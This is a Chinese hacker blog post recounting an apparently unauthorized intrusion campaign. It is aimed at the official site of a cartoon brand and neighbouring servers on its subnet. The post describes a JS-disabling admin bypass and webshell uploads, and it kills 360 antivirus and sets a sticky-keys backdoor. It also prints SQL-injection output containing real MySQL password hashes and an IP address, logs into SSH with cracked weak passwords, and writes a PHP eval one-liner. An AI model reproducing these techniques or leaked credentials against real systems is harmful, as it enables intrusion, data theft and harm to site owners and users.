对啊狸官网一次蛋疼XX

对啊狸官网的一次蛋疼XX0x00YY的念头昨晚大半夜在跟一妹纸聊天，还是刚认识不久的，样貌很行哦，突然冒出一个念头，额，本人很喜欢啊狸和悠嘻猴的公仔，想买对情侣的送给妹纸，然后呢，到找啊狸的官网上看，其实我也不知道怎么个，还有官网，突然呢，又想XXOO，X完后，看下能送一对来给我，太省钱了···只是YY。

0x01无从下手，我们先来踩踩，独立linux+lighttpd/1.4.26+php+mysql，主站为phpcms v9 ，论坛是dz7.2/7.0 ，简单看了下不存在弱口令之类的，漏洞也是没的，看whois信息。

于是我就想射射邮箱，可惜没弄下来，也没找到跟有关的信息，由于万网比较难社工客服，所以也没想搞劫持之类的。

0x02技巧技巧技巧于是乎看C段弄吧，一般我不会考虑搞C段的，因为很麻烦，搞不好就嗅探不了就浪费时间了。

在C段存活的主机也没太多，多数为独立域名，*nix的和win的数量差不多，所以我想从win的里搞。

看中一个，aspx+iis6+win03 的，也找到普遍的漏洞，开始连个后台也找不到，因为手上只有wwwscan 和菜刀，所以就扫啊扫，顺便手工也找下目录，字典比较烂，就找到了就没有了，利用搜索引擎也没找到这个网站的相关信息，OK，我们简单看下网站大概的结构。

这个事主页：这个事新闻页面：这个事主题页面：这个事下载页面：这个事留言板块页面：看出问题没有？！OK，我们刚才找到的是我大胆猜测是后台的第一个目录，我们来测试下，下一级目录出现403页面，也就是说目录存在，good，再猜下一级页面，如果不是文件就用工具扫，扫不到就继续猜猜看我的运气太好了。

我猜测目录都藏得不深不浅，应该不会存在什么万能密码，post注入，弱口令等等的吧，当然这是猜想，要测试后才知道，测试完毕后，我们先放在一边，看下能猜到编辑器路径没有，但是经过我一番乱猜，毛都没有。

突然我想到了一个问题，这个事大多数aspx系统程序都存在的问题，就是验证不严格。

嘿嘿，我前段时间不是公布了一个eizip3.0的后台文件验证不严格导致直接getwebshell的漏洞吗，虽然这个是我很久之前就发现的，但是我相信一定还有很多aspx系统程序也存在这个问题呢！OK，我们看下一步操作吧。

OK，我们来用老方法禁止js执行。

好了，设置完继续操作，禁止后就直接到后台了，：）我们看到添加，如果我们点击可能会有两个问题出现。

1、按下添加会没反应，由于禁止了js执行，所以导致按钮失效2、第二个就是成功咯。

我们再看。

直接添加管理，但是我测试了，在项目名称哪里可能由于禁止了js执行，所以导致无选项，最后导致添加不了管理，在这里我蛋碎一地。

后台页面也没有按钮可以给我点的了~~orz你们不会被难倒了吧？！这里可是第一个门槛啦，过了就开不了房子的门吗？答案是错的，记着我的话，我们一般禁止了js执行，看能导致页面框架变形，部分链接可能看不见，但这些链接是存在的，我们只是看不见表面而已，我们还有一个办法可以来进行找这些链接呢，你=想到什么办法吗？！Ok，我们来看怎么？！清楚怎么回事了吧！直接查看源码，剩下的链接就出来了，我们一个一个的测试，看下能找到利用的没，我找到了图片管理那里。

我们看下页面。

一个编辑器，但是我利用不了，因为禁止了js执行导致的，但是我们能上传，他有没有过滤我就不得而知了，我们直接测试下吧，看着名称是000，添加应该成功了，但是我找了一会也没找到路径，抓包也同样，当然也有可能没有添加成功，还有很多链接，我们一个一个测试吧。

于是我找到了一个能上传的页面仔细跟前面的看，是不同的，也就是说上传调用的页面也不同了。

这个事添加专家信息的页面，我在网站主页也找到了。

之后就上传了一匹asp一句话，在前台显示了这匹马，但是打开的时候是404，上传了几匹不同的马儿也是一样，开始我以为马儿不够壮，但是txt是能显示了，我猜是不是被墙了，或者是不支持asp呢，不支持asp应该不会吧，管理员没理由蛋疼到把asp解释也去除了，于是aspx能解释，放小马，上大马。

能执行cmd，内网，打了500+个补丁，简单看了下，mssql2005 ，su ，360 09年的版本。

由于测试网站很多，所以找了我一会才找到sa，因为对外部开放，所以放弃了，找到su，本来可以修改他的信息，当我使用exp的时候，随便挑个，发现拒绝访问，开始以为目录问题，换了N+1个也不行，怎么怎么怎么怎么怎么，aspx大马有个自带的看进程功能，发现360rp.exe，很简单嘛，直接K了，执行成功，上360神器，秒之，按5下shift，弹出cmd，然后你懂的，上服务器开CAIN，发现没有数据返回，这个蛋疼了，是不是装了个什么arp 墙了，好吧，我搞多一台服务器来开发包，因为手上这台太垃圾了，然后怕挂掉，之前我就是大半夜在一个游戏主站上双开，导致挂了，几个月了都连不进去，但是在另外一台内网中的服务器能ping通主站，这个我也不解，因为主站上用户数据库是放在mysql的另一台服务器上的，我看见root，所以想拿也拿不回了，mssql这台只是一个低级游戏数据库和，他的游戏npc，道具库，也没用。

所以现在我想到了再拿下一台一台用发包，一台用cain。

0x03难疼的弱口令经过多番XXOO，目标瞄准了一台linux的机子。

，貌似是一个叫闪聚手机聊天软件网站，Apache/2.2.14 Ubuntu10.04 php mysql>5.0 ，主站上我找到不到一个带参数的页面，于是乎扫下目录，找到admin，发现可遍历目录，好吧，弱口令进入后台，但是也没啥利用。

但是进过我仔细观察，发现一个重要的“秘密”。

当我把鼠标移到图片哪里，看见带参数了！于是我就YY了，Web Server: nginx/0.7.65Powered-by: PHP/5.3.2-1ubuntu4.9DB Server: MySQL >=5Resp. Time(avg): 961 msCurrent User: a dmin@124.205.62.21Sql Version: 5.5.18-logCurrent DB: shanjuSystem User: admin@124.205.62.21Host Name: shanju123Installation dir: /usr/local/mysqlDB User & Pass: root::localhostroot::shanju123root::127.0.0.1root::::localhost::shanju123admin:*F73CA1CE731C610A1F704255F94695CBF58FFA8A:%shajuslave_user:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:%shanju:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:%shanju:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:localhostshanju:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:127.0.0.1Data Bases: information_schemamysqlopenfireperformance_schema应该是反向代理了，所以对一般站点做踩点的时候应该多方位猜。

root密码没扫到，手工也是一个鸟样把hash解完后，我也省得手工去了，应为我发现不能外联的，能读，但是找不到路。

这里诱发一个问题，怎么我在域名后随便输入回显是APHCE，但是工具显示是NGINX，我们只要随便发个数据上去看。

大家可以看茄子牛的《关于安全宝产品的技术猜测》，你能发现其中奥秘，链接最后给出。

上面的hash解密后admin:adminshanju123shanjuslave_user:shanju123shanju:shanju123都是些弱口令，我就不太喜欢进行爆破的，什么3389，ssh，21，1433等的爆破和踩解，一般都是无路可走才去做的，所以~~~~蛋疼的事情发生了，连接ssh，输入root:toor/root/root123/shanju/adminshanju/adminshanju123/admin123/admin最后一个shanju123，我成功了！接下来就ls找到目录就写一句话。

Cd /var/www//www然后Echo test >1.php打开，显示test，成功。

再来Echo “<?php eval($_POST[f4ck])?>” >1.php文件显示存在，但是链接就是200，链接却不成功。

我就编辑下文件。

Vi 1.php发现确实是一句，直接保存退出，再用菜刀连接，成功了！我也不知道原因—0—```因为是聊天软件，所以应该有很多用户，根据图片判断应该有几十W帐户，谁知道连到库里一看只有8K+的用。

0x04失败的嗅探现在手上有两台机子了，一台发包，一台开嗅探，我选择使用linux来发包，win来嗅探，linux上我装上ettercap,win开CAIN，最后嗅探失败了，所以不写了。

第二天我上WIN上看数据的时候，发现WIN被植入木马了，还把我的密码改了，因为是弱口令原因，木马简单看了下。

创建服务，添加计划，每小时执行一次svchsot.exe，从而感染system32的原文件，然后修改注册表中的几个键值，可以看出哪个是扫鸡的。

《关于安全宝产品的技术猜测》/rayh4c/blog/item/38703d4e6c7629d6d0c86a64.html。